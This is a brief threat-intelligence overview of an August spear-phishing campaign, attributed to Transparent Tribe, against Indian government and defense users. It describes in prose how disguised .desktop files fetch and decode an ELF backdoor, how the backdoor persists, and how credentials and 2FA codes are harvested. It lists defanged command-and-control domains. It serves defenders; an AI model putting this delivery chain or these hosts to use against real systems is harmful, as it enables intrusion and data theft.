Overview

• CYFIRMA, CloudSEK and Hunt.io report an active August campaign that targets BOSS Linux and Windows users in Indian government and defense via spear‑phishing meeting notices.
• Malicious .desktop files disguised as PDFs execute a shell script that fetches a hex‑encoded payload from securestore[.]cv, decodes it to an ELF binary, and displays a decoy PDF hosted on Google Drive.
• The deployed Go-based malware contains a hardcoded command‑and‑control server at modgovindia[.]space:4000 and is engineered for stealthy remote control and data exfiltration.
• Persistence is achieved through autostart, cron jobs and systemd abuse, with samples showing statically linked ELF binaries and anti‑analysis checks noted by researchers.
• Hunt.io attributes the downstream access to a Transparent Tribe backdoor known as Poseidon, while related activity uses typo‑squatted domains to harvest credentials and Kavach 2FA codes on Pakistan‑hosted infrastructure.